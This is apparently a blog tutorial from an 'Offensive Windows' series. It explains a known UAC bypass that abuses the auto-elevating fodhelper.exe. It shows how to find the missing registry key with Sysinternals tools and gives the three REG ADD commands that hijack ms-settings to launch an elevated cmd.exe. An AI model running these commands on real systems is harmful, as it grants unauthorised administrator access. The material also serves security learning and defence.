Offensive Windows ~ User Account Control (UAC) Bypass

Local Privilege Escalation with fodhelper.exe

Offensive Windows ~ User Account Control (UAC) Bypass

In this 3rd part of "Offensive Windows", I'll be writing about a local privilege escalation possibility that exists in the application fodhelper.exe!

This whole vulnerability exists due to a nature of fodhelper.exe which requires administrative privileges to launch and if the user didn't have it, it would go ahead and automatically elevate its privileges without prompting the user with the usual UAC prompt seen below!

This could be abused where we could trigger another application to launch with the permissions fodhelper.exe has. Such as an admin command prompt shell.


Locating Vulnerability

C:\Windows\System32\fodhelper.exe

The first step would be to launch the application and monitor for any abnormal activities. Which doesn't seem to be the case with my install of Windows. The next step would be to scan the application's binary with sigcheck.exe. Sigcheck is part of Microsoft's Sysinternals Suite which can be downloaded for free.

C:\Tools\SysinternalsSuite>sigcheck.exe -a -m C:\Windows\System32\fodhelper.exe

Here we are able to see that the Requested Execution Level is Administrator and AutoElevate is set to True. This is exactly what we are going to exploit. Moving on, we are going to use Procmon.exe another application that comes packaged with Microsoft's Sysinternals Suite.

C:\Tools\SysinternalsSuite\Procmon.exe

Running fodhelper.exe with procmon open shows all all the actions and tasks that fodhelper attempts to execute. With the help of the following filters we are able to identify a few registry key's that are queried by fodhelper.exe that are non existent.

The filters are for:

  • Monitoring the process = fodhelper.exe
  • Checking the Operation for REG
  • Checking the Result NAME NOT FOUND
  • Checking the Path = HKCU [HKEY_CURRENT_USER]

This is what we are returned when fodhelper.exe is relaunched with procmon running. We can clearly see that fodhelper is requesting a non existent key HKCU\Software\Classes\ms-settings\Shell\Open\command.

Exploitation

So how we take advantage of this is, we create a new key of that path and set cmd to open as the value. Commands =

REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command
REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ
REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /d "cmd.exe" /f
  • Create a new key
  • Specify Value & Type
  • Set the Value to open up cmd.exe silently

Now, once we open fodhelper, the following will happen.

We can see that an admin command prompt shell has opened up in the background and we now have full system wide access! Privesc donzo!